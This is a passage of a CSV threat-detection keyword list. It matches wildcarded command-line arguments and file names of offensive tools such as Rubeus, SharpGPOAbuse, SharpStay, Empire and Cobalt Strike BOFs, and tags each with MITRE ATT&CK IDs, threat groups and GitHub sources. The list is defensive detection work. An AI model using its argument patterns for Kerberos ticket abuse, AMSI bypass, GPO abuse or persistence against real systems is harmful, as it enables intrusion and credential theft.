tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -* action=ScheduledTaskAction taskname=* command=*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -* action=SchTaskCOMHijack clsid=*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -* action=UserRegistryKey keyname=Debug keypath=HKCU:*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -* action=WMIEventSub command=* eventname=*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -* --adcs --old-bloodhound *,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -* --AddComputerTask --TaskName * --Author * --Command * --Arguments * --GPOName *,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,0,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z -* --AddLocalAdmin --UserAccount * --GPOName *,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,0,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z -* address-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --AddUserRights --UserRights * --UserAccount * --GPOName *,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,0,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z -* --AddUserScript --ScriptName * --ScriptContents * --GPOName *,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,0,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z -* --adfs-host * --krb-key * --krb-ticket *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -* ADFSpoof.py*,offensive_tool_keyword,ADFSpoof,A python tool to forge AD FS security tokens.,T1600 - T1600.001 - T1552 - T1552.004,TA0006 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/mandiant/ADFSpoof,1,0,N/A,10,4,300,52,2023-09-21T17:14:52Z,2019-03-20T22:30:58Z -* adhunt.py *,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -* adm2sys.py*,offensive_tool_keyword,PyExec,This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.,T1134 - T1055 - T1548.002,TA0004 - TA0005 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/OlivierLaflamme/PyExec,1,0,N/A,9,1,10,6,2019-09-11T13:56:04Z,2019-09-11T13:54:15Z -* admin-panels.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* afp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* afp-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* afp-path-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* afp-serverinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* afp-showmount.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -AgentDelay *,offensive_tool_keyword,empire,empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -AgentJitter *,offensive_tool_keyword,empire,empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* ajp-auth.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ajp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ajp-headers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ajp-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ajp-request.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Alcatraz.exe*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,0,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -* All_attack.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* allseeingeye-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* amqp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* amsi_disable *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -* --am-si-bypass=*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -* --Args AntiVirus --XorKey*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -* --args whoami*,offensive_tool_keyword,seatbelt,Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others,T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518,TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011,N/A,N/A,Persistence,https://github.com/GhostPack/Seatbelt,1,0,N/A,N/A,10,3137,606,2023-07-06T06:16:29Z,2018-07-24T17:38:51Z -* arp.x64.o,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,0,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -* asktgs * /ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* asktgs *.kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* asktgs /ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* asktgt * /service:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* asktgt /user *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* asktht /user:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* asm.py -t * -ln -w resources/*.txt -o *,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -* asn-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* asreproast *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* --asreproast *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* --asreproast *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* ASREProastables.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* ASREProastables.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --assemblyargs AntiVirus*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -* --assemblyargs AppLocker*,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -* Athena.Commands*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -* Athena.Models.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 